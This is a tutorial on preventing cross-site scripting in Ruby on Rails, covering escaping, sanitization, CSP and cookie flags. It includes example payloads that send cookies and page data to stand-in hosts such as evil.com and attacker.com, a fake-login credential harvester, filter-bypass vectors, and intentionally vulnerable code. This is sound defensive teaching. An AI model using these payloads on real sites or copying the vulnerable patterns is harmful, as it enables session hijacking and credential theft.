CrackedRuby

Cross-Site Scripting (XSS) Prevention

Overview

Cross-Site Scripting (XSS) represents a class of injection vulnerabilities where attackers inject malicious scripts into web pages viewed by other users. When successful, XSS attacks execute arbitrary JavaScript in the victim's browser within the security context of the vulnerable application, granting access to cookies, session tokens, and other sensitive information stored by the browser.

XSS vulnerabilities arise when applications include untrusted data in web pages without proper validation or escaping. The browser interprets this data as executable code rather than display content, leading to script execution. These vulnerabilities persist as one of the most prevalent security issues in web applications, consistently appearing in OWASP's Top 10 Web Application Security Risks.

The attack surface spans anywhere user input reaches a rendered page: form fields, URL parameters, database records, API responses, and even HTTP headers. Each injection point requires specific defensive measures tailored to the output context.

Three primary XSS variants exist:

Stored XSS persists malicious scripts in the application's data store (database, file system, cache). When other users retrieve and view this data, the application includes the malicious script in the response. This variant proves most dangerous as it affects multiple users without requiring them to click malicious links.

Reflected XSS occurs when an application immediately includes untrusted input in its response. Attackers craft malicious URLs containing script payloads, then trick users into clicking them. The server reflects the payload back in the response, causing the browser to execute it.

DOM-based XSS exists entirely client-side. Malicious scripts manipulate the Document Object Model through JavaScript, often by reading from unsafe sources like window.location or document.referrer and writing to dangerous sinks like innerHTML or eval.

# Vulnerable code - Stored XSS
class CommentsController < ApplicationController
  def create
    @comment = Comment.new(comment: params[:comment])
    @comment.save
  end
  
  def show
    @comment = Comment.find(params[:id])
    # Template contains: <%= @comment.comment.html_safe %>
    # Malicious comment: <script>fetch('https://evil.com?cookie='+document.cookie)</script>
  end
end

The impact extends beyond data theft. Attackers use XSS to perform actions as the victim user, deface websites, install keyloggers, redirect users to phishing sites, or exploit browser vulnerabilities. In applications with elevated privileges, XSS can facilitate complete account takeover or system compromise.

Key Principles

XSS prevention operates on defense-in-depth, applying multiple layers of protection rather than relying on a single technique. The primary principle mandates treating all user input as untrusted data requiring contextual encoding before insertion into web pages.

Context-Aware Output Encoding forms the foundation of XSS defense. Different contexts require different encoding schemes. HTML content requires HTML entity encoding, JavaScript strings need JavaScript encoding, URLs need percent encoding, and CSS requires CSS encoding. Applying the wrong encoding for a context fails to prevent XSS.

# Context-aware encoding examples
user_input = "<script>alert('XSS')</script>"

# HTML context - encode HTML entities
html_encoded = CGI.escapeHTML(user_input)
# => "&lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;"

# JavaScript string context - encode for JavaScript
js_encoded = user_input.gsub(/[<>'"\/]/) { |c| sprintf("\\u%04x", c.ord) }
# => \u003cscript\u003ealert(\u0027XSS\u0027)\u003c\u002fscript\u003e (shown unquoted; each backslash is literal)

# URL parameter context - percent encode
url_encoded = CGI.escape(user_input)
# => "%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E"

Secure by Default design ensures frameworks and templates automatically escape output unless developers explicitly mark content as safe. Ruby on Rails exemplifies this principle by HTML-escaping all template output by default. Developers must consciously use methods like html_safe or raw to bypass escaping, creating an explicit security decision point.

Input Validation provides an additional defense layer but never serves as the sole protection mechanism. Validation establishes allowlists of acceptable input patterns, rejecting anything that doesn't match. However, validation alone proves insufficient because requirements often demand accepting HTML or other potentially dangerous content.

# Input validation - defense in depth
class UserProfile < ApplicationRecord
  validates :username, format: { 
    with: /\A[a-zA-Z0-9_-]+\z/,
    message: "only allows letters, numbers, underscores and hyphens"
  }
  
  validates :website_url, format: {
    with: /\Ahttps?:\/\//,
    message: "must start with http:// or https://"
  }
end
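
The website_url rule above only checks the prefix of the string. As a stricter sketch, assuming plain Ruby and the standard-library URI module, the value can be parsed and its scheme compared against an allowlist. The helper name safe_http_url? and the constant ALLOWED_SCHEMES are hypothetical, not part of Rails.

```ruby
require 'uri'

# Hypothetical allowlist of schemes that may appear in user-supplied links
ALLOWED_SCHEMES = %w[http https].freeze

# Returns true only for absolute http/https URLs that include a host
def safe_http_url?(value)
  uri = URI.parse(value.to_s.strip)
  ALLOWED_SCHEMES.include?(uri.scheme&.downcase) && !uri.host.to_s.empty?
rescue URI::InvalidURIError
  false
end

safe_http_url?("https://example.com/profile")  # accepted
safe_http_url?("javascript:alert(1)")          # rejected: scheme not in allowlist
```

Parsing first means the decision is made on the scheme the URI library actually sees rather than on a textual prefix.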

Content Security Policy (CSP) restricts the sources from which browsers load resources. Even if an XSS vulnerability exists, a policy that disallows inline scripts and limits script sources can stop injected scripts from executing or loading from unauthorized domains. CSP operates as a last line of defense when output encoding fails or developers make mistakes.

Sanitization differs from encoding by removing or modifying dangerous content rather than encoding it for safe display. Sanitization applies when applications must accept rich HTML content like blog posts or comments with formatting. Sanitizers parse HTML and strip dangerous elements, attributes, and protocols while preserving safe markup.

The principle of least privilege applies to browser contexts. Applications should minimize the use of dangerous JavaScript APIs like eval, Function, and innerHTML. When these APIs prove necessary, applications must rigorously validate and sanitize all inputs.

Security headers provide additional protection layers. The X-XSS-Protection header is deprecated: current major browsers have removed the built-in XSS filters it controlled, so it matters only for legacy browsers, and CSP should be treated as its replacement. The X-Content-Type-Options header prevents MIME-sniffing attacks that could reinterpret responses as executable content.
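
As a rough sketch of how such headers can be attached to every response, the following Rack-style middleware needs no gem. The class name SecurityHeaders and the header values are assumptions for illustration; a real application would more likely configure these through Rails or the secure_headers gem.

```ruby
# Minimal Rack-style middleware sketch. SecurityHeaders is a hypothetical
# name and the policy values are illustrative only.
class SecurityHeaders
  DEFAULT_HEADERS = {
    "content-security-policy" => "default-src 'self'; script-src 'self'",
    "x-content-type-options"  => "nosniff"
  }.freeze

  def initialize(app)
    @app = app
  end

  def call(env)
    status, headers, body = @app.call(env)
    # Keep any header the application already set; fill in the rest
    [status, DEFAULT_HEADERS.merge(headers), body]
  end
end

# Usage with a stand-in app (any object responding to call(env))
app = ->(_env) { [200, { "content-type" => "text/html" }, ["<p>Hello</p>"]] }
status, headers, _body = SecurityHeaders.new(app).call({})
```

Merging the defaults first lets individual endpoints override a header when they have a reason to.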

# Multiple defense layers
class ArticlesController < ApplicationController
  def create
    # Layer 1: Input validation
    return render_error unless valid_article_params?
    
    # Layer 2: Sanitization for rich content
    @article = Article.new(
      title: params[:title], # Will be HTML escaped in view
      content: sanitize_html(params[:content])
    )
    
    # Layer 3: CSP header (configured in application)
    # Layer 4: Automatic output encoding in templates
  end
  
  private
  
  def sanitize_html(html)
    ActionController::Base.helpers.sanitize(html, 
      tags: %w[p br strong em ul ol li],
      attributes: %w[href]
    )
  end
end

Security Implications

XSS vulnerabilities grant attackers the same privileges as the victimized user within the application. This equivalent access enables session hijacking, where attackers steal session cookies and impersonate the user without needing credentials. The attack executes silently, leaving users unaware their session has been compromised.

Session hijacking through XSS bypasses many authentication protections. Applications that properly hash passwords and implement multi-factor authentication remain vulnerable if session tokens can be stolen post-authentication. Attackers exfiltrate tokens using simple JavaScript.

# XSS payload that steals session cookie
# <script>
#   fetch('https://attacker.com/steal', {
#     method: 'POST',
#     body: JSON.stringify({
#       cookie: document.cookie,
#       location: window.location.href,
#       localStorage: JSON.stringify(localStorage)
#     })
#   });
# </script>

HttpOnly cookies mitigate but don't eliminate this threat. While HttpOnly cookies prevent JavaScript from reading document.cookie, attackers still perform actions as the authenticated user. XSS payloads can submit forms, make AJAX requests, and interact with the application using the user's existing session.
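
For illustration, these flags end up as attributes on the Set-Cookie response header. Rails builds that header itself; the hand-rolled function below (a hypothetical name, with an assumed SameSite=Lax default) only shows what the browser receives.

```ruby
# Hypothetical helper that assembles a Set-Cookie value by hand
def session_cookie_header(name, value, secure: true)
  attributes = ["#{name}=#{value}", "Path=/", "HttpOnly", "SameSite=Lax"]
  attributes << "Secure" if secure
  attributes.join("; ")
end

session_cookie_header("_myapp_session", "abc123")
# => "_myapp_session=abc123; Path=/; HttpOnly; SameSite=Lax; Secure"
```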

Credential theft extends beyond session tokens. XSS enables attackers to inject fake login forms that capture credentials when users enter them. The malicious form sends credentials to attacker-controlled servers while maintaining the appearance of legitimate application behavior.

# Stored XSS that creates a credential harvester
malicious_comment = <<-HTML
  <div style="position:absolute;top:0;left:0;width:100%;height:100%;background:white;z-index:9999">
    <h1>Session Expired - Please Login Again</h1>
    <form action="https://attacker.com/harvest" method="POST">
      <input name="username" placeholder="Username" />
      <input name="password" type="password" placeholder="Password" />
      <button type="submit">Login</button>
    </form>
  </div>
HTML

Cross-Site Request Forgery (CSRF) bypass occurs when XSS vulnerabilities exist alongside CSRF protections. CSRF tokens protect against unauthorized form submissions, but XSS allows attackers to read these tokens from the page and include them in malicious requests. This negates CSRF protection entirely.

Privilege escalation happens when XSS affects administrative interfaces. An administrator viewing malicious content executes attacker scripts with administrative privileges, enabling unauthorized user creation, permission modification, or system configuration changes.

Information disclosure results from XSS reading sensitive page content. Attackers extract data from the DOM including personal information, business data, and system details that inform further attacks. Applications displaying sensitive data to authenticated users become particularly vulnerable.

# XSS payload extracting sensitive data
# <script>
#   const sensitiveData = {
#     accountNumber: document.querySelector('[data-account]').textContent,
#     balance: document.querySelector('[data-balance]').textContent,
#     transactions: Array.from(document.querySelectorAll('.transaction'))
#       .map(t => t.textContent)
#   };
#   fetch('https://attacker.com/exfil', {
#     method: 'POST',
#     body: JSON.stringify(sensitiveData)
#   });
# </script>

Malware distribution leverages XSS to redirect users to exploit kits and malicious downloads. Attackers inject scripts that detect browser versions and redirect to exploits targeting specific vulnerabilities. This transforms website compromise into broader malware campaigns.

The stored XSS variant creates persistent threats affecting every user who views the compromised content. A single stored XSS vulnerability in a popular page impacts thousands of users automatically, while reflected XSS requires social engineering to trick each victim individually.

Defacement attacks damage reputation and user trust. Attackers use XSS to modify page content, display unauthorized messages, or redirect users to competing or malicious sites. Even temporary defacement causes lasting reputational harm.

DOM-based XSS proves particularly insidious because payloads never reach the server. Traditional Web Application Firewalls (WAFs) and server-side security measures don't detect these attacks, as the vulnerability exists entirely in client-side JavaScript code.

Regulatory compliance considerations amplify XSS risk. Data breaches resulting from XSS exploitation trigger notification requirements under GDPR, CCPA, and similar regulations. Organizations face fines, legal liability, and mandatory disclosure obligations when attackers use XSS to access protected data.

The combination of XSS with other vulnerabilities amplifies impact. XSS facilitates reconnaissance for SQL injection by extracting database error messages. It bypasses Same-Origin Policy restrictions when combined with CORS misconfigurations. XSS transforms minor vulnerabilities into critical security failures.

Ruby Implementation

Ruby on Rails provides automatic XSS protection through its templating system. All ERB template output undergoes HTML escaping by default, converting dangerous characters into HTML entities that browsers display rather than execute.

# Automatic HTML escaping in ERB templates
# View template: app/views/posts/show.html.erb
<h1><%= @post.title %></h1>
<div class="content">
  <%= @post.body %>
</div>

# If @post.title contains: <script>alert('XSS')</script>
# Rails outputs: &lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;
# Browser displays: <script>alert('XSS')</script> (as text, not executed)
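
Outside Rails this escaping is not automatic. As a sketch using only the standard library's ERB, which inserts values verbatim unless asked to escape them, the same conversion can be requested explicitly with ERB::Util.html_escape. The template and the title variable are made up for the example.

```ruby
require 'erb'

# Plain ERB does not escape on its own, so the template calls html_escape
template = ERB.new("<h1><%= ERB::Util.html_escape(title) %></h1>")
html = template.result_with_hash(title: "<script>alert('XSS')</script>")

puts html
# <h1>&lt;script&gt;alert(&#39;XSS&#39;)&lt;/script&gt;</h1>
```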

The html_safe method marks strings as safe for direct HTML output, bypassing automatic escaping. This method must be used judiciously and only on content that has been explicitly sanitized or generated by the application.

# Marking content as HTML safe
class Post < ApplicationRecord
  def formatted_content
    # DANGEROUS: Never use html_safe on user input directly
    # self.body.html_safe  # BAD
    
    # SAFE: Sanitize first, then mark as safe
    ActionController::Base.helpers.sanitize(self.body).html_safe
  end
end

# In view
<%= @post.formatted_content %>
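
To make the idea of "marking" concrete, here is a toy model in plain Ruby. It is not how Rails is implemented (the real class is ActiveSupport::SafeBuffer); TrustedHtml and render_value are hypothetical names used only to show that the marker changes what the renderer does, not what the string contains.

```ruby
require 'erb'

# Toy stand-in for a string that has been marked as safe
class TrustedHtml < String
  def html_safe?
    true
  end
end

# Mimics what <%= %> does in a Rails view: escape unless marked safe
def render_value(value)
  if value.respond_to?(:html_safe?) && value.html_safe?
    value.to_s
  else
    ERB::Util.html_escape(value.to_s)
  end
end

render_value("<b>hi</b>")                   # => "&lt;b&gt;hi&lt;/b&gt;"
render_value(TrustedHtml.new("<b>hi</b>"))  # => "<b>hi</b>"
```

The marked string passes through untouched, which is why marking unsanitized user input is equivalent to disabling escaping for it.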

Rails provides the sanitize helper for cleaning HTML while preserving safe markup. The helper accepts tag and attribute allowlists, removing everything not explicitly permitted.

# Configuring HTML sanitization
class CommentsController < ApplicationController
  def create
    @comment = Comment.new(
      body: sanitized_comment_body
    )
    @comment.save
  end
  
  private
  
  def sanitized_comment_body
    # Controllers reach view helpers through `helpers`. The Rails sanitizer
    # takes flat allowlists of tag and attribute names; unsafe URL schemes
    # such as javascript: are handled by its built-in protocol allowlist.
    helpers.sanitize(params[:comment][:body],
      tags: %w[p br strong em a ul ol li blockquote],
      attributes: %w[href title cite]
    )
  end
end

The rails-html-sanitizer gem (Rails default) provides the underlying sanitization functionality. Applications can customize sanitizer configuration globally or per-controller.

# Custom sanitizer configuration
class ApplicationController < ActionController::Base
  def sanitize_rich_text(html)
    sanitizer = Rails::Html::SafeListSanitizer.new
    sanitizer.sanitize(html, 
      tags: safe_tags,
      attributes: safe_attributes
    )
  end
  
  def safe_tags
    %w[
      p br strong em u s a
      h1 h2 h3 h4 h5 h6
      ul ol li
      blockquote pre code
      table thead tbody tr th td
    ]
  end
  
  def safe_attributes
    # The sanitizer expects a flat list of attribute names
    %w[href title target scope colspan rowspan]
  end
end

Embedding Ruby strings in inline JavaScript requires JavaScript-specific escaping rather than HTML escaping. Rails provides escape_javascript (alias j) for safely embedding Ruby strings in JavaScript string literals.

# Escaping for JavaScript contexts
# View template with inline JavaScript
<script>
  var userName = '<%= j @user.name %>';
  var userBio = '<%= j @user.bio %>';
  
  // Even if @user.name contains quotes or </script> tags,
  // escape_javascript prevents breaking out of the string
</script>

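# Simplified sketch of the implementation (the version shipped with Rails
# also escapes backticks, "$", and the U+2028/U+2029 line separators)
module ActionView::Helpers::JavaScriptHelper
  JS_ESCAPE_MAP = {
    '\\'    => '\\\\',
    '</'    => '<\/',
    "\r\n"  => '\n',
    "\n"    => '\n',
    "\r"    => '\n',
    '"'     => '\\"',
    "'"     => "\\'"
  }
  
  def escape_javascript(javascript)
    # Every alternative in the pattern has an entry in JS_ESCAPE_MAP
    javascript.to_s.gsub(/(\\|<\/|\r\n|[\n\r"'])/) do
      JS_ESCAPE_MAP[$1]
    end
  end
end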

Content Security Policy configuration in Rails restricts script execution sources. The secure_headers gem simplifies CSP implementation.

# Gemfile
gem 'secure_headers'

# config/initializers/secure_headers.rb
SecureHeaders::Configuration.default do |config|
  config.csp = {
    default_src: %w['self'],
    script_src: %w['self' 'unsafe-inline' 'unsafe-eval'], # Permissive: these keywords let injected inline scripts run
    style_src: %w['self' 'unsafe-inline'],
    img_src: %w['self' data: https:],
    font_src: %w['self' data:],
    connect_src: %w['self'],
    frame_ancestors: %w['none']
  }
  
  config.x_frame_options = "DENY"
  config.x_content_type_options = "nosniff"
  config.x_xss_protection = "1; mode=block"
  config.referrer_policy = "strict-origin-when-cross-origin"
end

# Strict CSP configuration (recommended)
SecureHeaders::Configuration.override(:strict) do |config|
  config.csp = {
    default_src: %w['none'],
    script_src: %w['self'],
    style_src: %w['self'],
    img_src: %w['self' https:],
    font_src: %w['self'],
    connect_src: %w['self'],
    frame_ancestors: %w['none'],
    base_uri: %w['self'],
    form_action: %w['self']
  }
end

The Loofah gem provides additional sanitization capabilities with more granular control than the default sanitizer.

# Using Loofah for advanced sanitization
require 'loofah'

class ArticleProcessor
  def self.sanitize_article(html)
    # Parse as a fragment so the output has no <html>/<body> wrapper
    fragment = Loofah.fragment(html)
    
    # Remove dangerous elements together with their contents
    fragment.css('script, iframe, object, embed').each(&:remove)
    
    # Strip remaining unsafe tags and attributes, including event handlers
    fragment.scrub!(:strip)
    
    # Keep only http(s) and site-relative links
    fragment.css('a').each do |link|
      href = link['href']
      unless href&.start_with?('http://', 'https://', '/')
        link.remove_attribute('href')
      end
    end
    
    fragment.to_s
  end
end

HttpOnly and Secure cookie flags prevent JavaScript access to session cookies and ensure transmission only over HTTPS.

# config/initializers/session_store.rb
Rails.application.config.session_store :cookie_store,
  key: '_myapp_session',
  httponly: true,
  secure: Rails.env.production?,
  same_site: :lax

# Setting cookies with security flags
class SessionsController < ApplicationController
  def create
    cookies.encrypted[:user_id] = {
      value: user.id,
      httponly: true,
      secure: Rails.env.production?,
      same_site: :strict
    }
  end
end

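Parameter filtering keeps sensitive values out of log files. It does not prevent XSS, but it limits what an attacker can harvest if log output is ever rendered in a vulnerable page, such as an admin log viewer.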

# config/initializers/filter_parameter_logging.rb
Rails.application.config.filter_parameters += [
  :password, :password_confirmation,
  :ssn, :credit_card, :cvv,
  :api_key, :secret_key, :token
]

Practical Examples

User profile pages commonly suffer from XSS when displaying biographical information or social media links. Attackers inject malicious scripts into profile fields, compromising every user who views the profile.

# Vulnerable implementation
class ProfilesController < ApplicationController
  def show
    @user = User.find(params[:id])
  end
end

# app/views/profiles/show.html.erb (VULNERABLE)
<div class="profile">
  <h1><%= @user.name %></h1>
  <div class="bio"><%= @user.bio.html_safe %></div>
  <a href="<%= @user.website %>">Website</a>
</div>

# Attack vectors:
# @user.bio = "<script>document.location='http://evil.com/steal?cookie='+document.cookie</script>"
# @user.website = "javascript:alert(document.cookie)"

Secure implementation applies appropriate encoding and validation:

# Secure implementation
class User < ApplicationRecord
  validates :website, format: { 
    with: /\Ahttps?:\/\//,
    message: "must be a valid HTTP or HTTPS URL"
  }
  
  def sanitized_bio
    ActionController::Base.helpers.sanitize(bio,
      tags: %w[p br strong em],
      attributes: []
    )
  end
end

# app/views/profiles/show.html.erb (SECURE)
<div class="profile">
  <h1><%= @user.name %></h1>
  <div class="bio"><%= @user.sanitized_bio.html_safe %></div>
  <% if @user.website.present? %>
    <a href="<%= @user.website %>" rel="noopener noreferrer" target="_blank">Website</a>
  <% end %>
</div>

Search functionality presents reflected XSS vulnerabilities when displaying search queries back to users. Attackers craft malicious URLs that execute scripts when victims click them.

# Vulnerable search implementation
class SearchController < ApplicationController
  def results
    @query = params[:q]
    @results = Article.where("title LIKE ?", "%#{@query}%")
  end
end

# app/views/search/results.html.erb (VULNERABLE)
<h2>Results for: <%= @query.html_safe %></h2>

# Malicious URL:
# /search?q=<script>fetch('http://evil.com?c='+document.cookie)</script>

Secure search displays the query safely:

# Secure search implementation
class SearchController < ApplicationController
  def results
    @query = params[:q]&.strip
    
    # Validate query length and content
    if @query.blank? || @query.length > 100
      redirect_to root_path, alert: "Invalid search query"
      return
    end
    
    # Parameterized query prevents SQL injection
    @results = Article.where("title LIKE ?", "%#{sanitize_sql_like(@query)}%")
  end
  
  private
  
  def sanitize_sql_like(string)
    string.gsub(/[\\%_]/) { |x| "\\#{x}" }
  end
end

# app/views/search/results.html.erb (SECURE)
<h2>Results for: <%= @query %></h2>
<%# Rails automatically HTML-escapes @query %>

Comment systems require particularly careful XSS prevention as they allow user-generated content visible to all users. Stored XSS in comments affects every reader.

# Comprehensive comment security
class Comment < ApplicationRecord
  belongs_to :article
  belongs_to :user
  
  validates :body, presence: true, length: { maximum: 5000 }
  
  before_save :sanitize_body
  
  def sanitized_content
    # Already sanitized in before_save, mark as safe for rendering
    body.html_safe
  end
  
  private
  
  def sanitize_body
    # Flat attribute allowlist; href schemes are checked by the sanitizer itself
    self.body = ActionController::Base.helpers.sanitize(body,
      tags: %w[p br strong em a blockquote],
      attributes: %w[href title]
    )
  end
end

class CommentsController < ApplicationController
  before_action :authenticate_user!
  before_action :rate_limit_comments
  
  def create
    @article = Article.find(params[:article_id])
    @comment = @article.comments.build(comment_params)
    @comment.user = current_user
    
    if @comment.save
      redirect_to @article, notice: "Comment posted"
    else
      render 'articles/show', status: :unprocessable_entity
    end
  end
  
  private
  
  def comment_params
    params.require(:comment).permit(:body)
  end
  
  def rate_limit_comments
    # Prevent XSS payload spamming
    recent_comments = current_user.comments
      .where("created_at > ?", 5.minutes.ago)
      .count
      
    if recent_comments >= 5
      redirect_to root_path, alert: "Too many comments, please wait"
    end
  end
end

Admin panels handle sensitive operations and privileged data, making them prime XSS targets. Privilege escalation through admin XSS enables complete system compromise.

# Secure admin panel with CSP
class Admin::BaseController < ApplicationController
  before_action :require_admin
  before_action :set_strict_csp
  
  private
  
  def require_admin
    unless current_user&.admin?
      redirect_to root_path, alert: "Access denied"
    end
  end
  
  def set_strict_csp
    # Override with strict CSP for admin area
    use_secure_headers_override(:admin_strict)
  end
end

# config/initializers/secure_headers.rb
SecureHeaders::Configuration.override(:admin_strict) do |config|
  config.csp = {
    default_src: %w['none'],
    script_src: %w['self'],
    style_src: %w['self'],
    img_src: %w['self'],
    font_src: %w['self'],
    connect_src: %w['self'],
    frame_ancestors: %w['none'],
    base_uri: %w['self'],
    form_action: %w['self']
  }
end

# Admin user management
class Admin::UsersController < Admin::BaseController
  def update
    @user = User.find(params[:id])
    
    # Never trust user input, even in admin panels
    if @user.update(sanitized_user_params)
      redirect_to admin_user_path(@user), notice: "User updated"
    else
      render :edit
    end
  end
  
  private
  
  def sanitized_user_params
    permitted = params.require(:user).permit(:name, :email, :role)
    
    # Additional validation for admin operations
    if permitted[:name].present?
      permitted[:name] = ActionController::Base.helpers.sanitize(
        permitted[:name],
        tags: []
      )
    end
    
    permitted
  end
end

Common Patterns

The Template Escaping Pattern relies on framework defaults to handle XSS prevention automatically. This pattern proves most effective when developers understand that disabling auto-escaping requires explicit justification.

# Template escaping pattern
# Correct: Let Rails handle escaping
<div class="user-content">
  <%= @content %>
</div>

# Incorrect: Unnecessary manual escaping (the output is escaped twice)
<div class="user-content">
  <%= CGI.escapeHTML(@content) %>
</div>

# Correct: Sanitize rich content before marking safe
<div class="user-content">
  <%= sanitize(@content, tags: %w[p br strong em]).html_safe %>
</div>

The Allowlist Pattern explicitly defines permitted HTML elements and attributes, rejecting everything else. This proves more secure than denylists which attempt to block known dangerous patterns but miss new attack vectors.

# Allowlist pattern for rich text
module RichTextSanitizer
  ALLOWED_TAGS = %w[
    p br div span
    strong em u s
    h1 h2 h3 h4 h5 h6
    ul ol li
    a blockquote pre code
    table thead tbody tr th td
  ].freeze
  
  # The Rails sanitizer takes a flat list of attribute names; URL schemes
  # in href are checked against its built-in protocol allowlist
  ALLOWED_ATTRIBUTES = %w[href title scope colspan rowspan class].freeze
  
  def self.sanitize(html)
    ActionController::Base.helpers.sanitize(html,
      tags: ALLOWED_TAGS,
      attributes: ALLOWED_ATTRIBUTES
    )
  end
end

# Usage
class Article < ApplicationRecord
  before_save :sanitize_content
  
  def sanitize_content
    self.body = RichTextSanitizer.sanitize(body)
  end
end

The Content Security Policy Pattern implements defense-in-depth by restricting resource loading even when XSS vulnerabilities exist. CSP headers tell browsers which sources to trust for scripts, styles, and other resources.

# CSP pattern with nonce-based scripts
class ApplicationController < ActionController::Base
  before_action :set_csp_nonce
  
  private
  
  def set_csp_nonce
    @csp_nonce = SecureRandom.base64(16)
    
    response.headers['Content-Security-Policy'] = [
      "default-src 'self'",
      "script-src 'self' 'nonce-#{@csp_nonce}'",
      "style-src 'self' 'unsafe-inline'",
      "img-src 'self' https: data:",
      "font-src 'self'",
      "connect-src 'self'",
      "frame-ancestors 'none'",
      "base-uri 'self'",
      "form-action 'self'"
    ].join('; ')
  end
end

# In views, use the nonce for inline scripts
<script nonce="<%= @csp_nonce %>">
  console.log('This script is allowed');
</script>

The Contextual Encoding Pattern applies different encoding schemes based on where data appears in the output. HTML context uses HTML encoding, JavaScript context uses JavaScript encoding, URL context uses percent encoding.

# Contextual encoding pattern
class OutputEncoder
  def self.for_html(text)
    CGI.escapeHTML(text.to_s)
  end
  
  def self.for_javascript(text)
    # Escape characters that could break out of JS strings
    text.to_s.gsub(/[\u0000-\u001f"'\\\/<>]/) do |char|
      case char
      when "\n" then '\n'
      when "\r" then '\r'
      when "\t" then '\t'
      when '"'  then '\"'
      when "'"  then "\\\'"
      when '\\' then '\\\\'
      when '/'  then '\\/'
      when '<'  then '\u003c'
      when '>'  then '\u003e'
      else
        sprintf("\\u%04x", char.ord)
      end
    end
  end
  
  def self.for_url(text)
    CGI.escape(text.to_s)
  end
  
  def self.for_css(text)
    # Escape every other character as a six-digit hex escape; the fixed
    # width stops following characters from being read as part of the escape
    text.to_s.gsub(/[^a-zA-Z0-9\-_]/) do |char|
      sprintf("\\%06x", char.ord)
    end
  end
end

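# Usage in views
# ERB HTML-escapes plain strings on top of any manual encoding, so output
# that is already encoded for its context is passed through raw
<div data-username="<%= raw OutputEncoder.for_html(@user.name) %>"></div>
<script>
  var name = "<%= raw OutputEncoder.for_javascript(@user.name) %>";
  var profileUrl = "/users/<%= OutputEncoder.for_url(@user.name) %>";
</script>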
<style>
  .user-<%= OutputEncoder.for_css(@user.name) %> {
    color: blue;
  }
</style>

The Sanitization Wrapper Pattern encapsulates HTML sanitization logic in dedicated service objects, ensuring consistent application of security rules.

# Sanitization wrapper pattern
class ContentSanitizer
  attr_reader :content, :context
  
  def initialize(content, context = :default)
    @content = content
    @context = context
  end
  
  def sanitize
    case context
    when :comment
      sanitize_comment
    when :article
      sanitize_article
    when :profile
      sanitize_profile
    else
      sanitize_basic
    end
  end
  
  private
  
  def sanitize_comment
    ActionController::Base.helpers.sanitize(content,
      tags: %w[p br strong em a],
      attributes: %w[href]
    )
  end
  
  def sanitize_article
    ActionController::Base.helpers.sanitize(content,
      tags: %w[p br strong em u s h2 h3 a ul ol li blockquote pre code],
      attributes: %w[href title]
    )
  end
  
  def sanitize_profile
    ActionController::Base.helpers.sanitize(content,
      tags: %w[p br strong em],
      attributes: []
    )
  end
  
  def sanitize_basic
    ActionController::Base.helpers.sanitize(content, tags: [])
  end
end

# Usage
class Comment < ApplicationRecord
  before_save :sanitize_body
  
  def sanitize_body
    self.body = ContentSanitizer.new(body, :comment).sanitize
  end
end

Common Pitfalls

Developers frequently misunderstand the html_safe method, treating it as a sanitizer when it merely marks strings as safe for rendering without escaping. Calling html_safe on untrusted input creates immediate XSS vulnerabilities.

# DANGEROUS: html_safe without sanitization
class Post < ApplicationRecord
  def formatted_body
    body.html_safe  # XSS vulnerability
  end
end

# SAFE: Sanitize before marking safe
class Post < ApplicationRecord
  def formatted_body
    ActionController::Base.helpers.sanitize(body).html_safe
  end
end

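String concatenation with html_safe strings is a frequent source of confusion. Rails tracks safe strings through the ActiveSupport::SafeBuffer class: appending an unsafe string to a SafeBuffer escapes it automatically, but interpolating into a plain string, or putting the plain string on the left side, discards that tracking. The result is either double escaping or, if html_safe is then called on the combined string, an XSS vulnerability.

# Concatenation pitfalls
safe_string = "<strong>Bold</strong>".html_safe
user_input = params[:name]

# Safe: SafeBuffer on the left escapes the unsafe operand automatically
result = safe_string + user_input  # result is still html_safe

# Wrong: interpolation builds a plain String; html_safe then marks the
# unescaped user input as trusted
result = "#{safe_string} #{user_input}".html_safe  # XSS vulnerability

# Wrong: plain String on the left returns a plain String, so the view
# escapes the <strong> markup as well
result = user_input + safe_string

# Better: build markup with Rails helpers (inside a view or helper)
result = tag.p do
  safe_string + tag.span(user_input)
end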

JSON rendering in JavaScript contexts requires proper escaping, but developers often emit JSON directly into script tags without encoding. This creates XSS when JSON contains user-controlled strings with script-breaking characters.

# VULNERABLE: Raw JSON in script tag
<script>
  var userData = <%= raw @user.to_json %>;
  // If the JSON is emitted without HTML-entity escaping and
  // @user.name contains </script>, it breaks out of the script block
</script>

# SAFE: Use json_escape helper
<script>
  var userData = <%= raw json_escape(@user.to_json) %>;
</script>

# BETTER: Use data attributes
<div id="user-data" data-user="<%= @user.to_json %>"></div>
<script>
  var userData = JSON.parse(
    document.getElementById('user-data').dataset.user
  );
</script>
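
Where no framework helper is available, the same idea can be sketched with the standard-library JSON module: generate the JSON, then rewrite the characters that could terminate a script block as \uXXXX escapes, which JSON parsers and JavaScript both read back as the original characters. The helper name script_safe_json is hypothetical, and this is an illustration similar in spirit to json_escape rather than a replacement for it.

```ruby
require 'json'

# Hypothetical helper: JSON in which <, >, &, U+2028 and U+2029 are
# written as \uXXXX so the text cannot close a <script> element
def script_safe_json(data)
  JSON.generate(data).gsub(/[<>&\u2028\u2029]/) { |char| format('\u%04x', char.ord) }
end

payload = { "name" => "</script><script>alert(1)</script>" }
encoded = script_safe_json(payload)

encoded.include?("</script>")   # => false
JSON.parse(encoded) == payload  # => true
```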

Sanitizer bypass occurs when developers create custom sanitization logic without considering all attack vectors. Attackers use character encoding tricks, nested tags, and protocol handlers to circumvent naive filtering.

# VULNERABLE: Incomplete custom sanitization
def sanitize_custom(html)
  html.gsub(/<script.*?>.*?<\/script>/im, '')  # Misses many variants
end

# Attack vectors that bypass:
# <scr<script>ipt>alert(1)</scr</script>ipt>
# <img src=x onerror=alert(1)>
# <a href="javascript:alert(1)">Click</a>

# SAFE: Use battle-tested sanitizer
def sanitize_custom(html)
  ActionController::Base.helpers.sanitize(html,
    tags: permitted_tags,
    attributes: permitted_attributes
  )
end
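
A quick way to see the gap is to run the naive filter against payloads that contain no script tag at all. The sketch below repeats the regex from the vulnerable version under a different, hypothetical method name so it can run on its own in plain Ruby.

```ruby
# Same pattern as the vulnerable filter, renamed for a standalone run
def strip_script_tags(html)
  html.gsub(/<script.*?>.*?<\/script>/im, '')
end

payloads = [
  "<img src=x onerror=alert(1)>",
  '<a href="javascript:alert(1)">Click</a>'
]

payloads.each do |payload|
  filtered = strip_script_tags(payload)
  # Both payloads come back byte-for-byte identical
  puts "unchanged: #{filtered}" if filtered == payload
end
```

The filter does remove a literal script element, which is exactly why it appears to work in casual testing.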

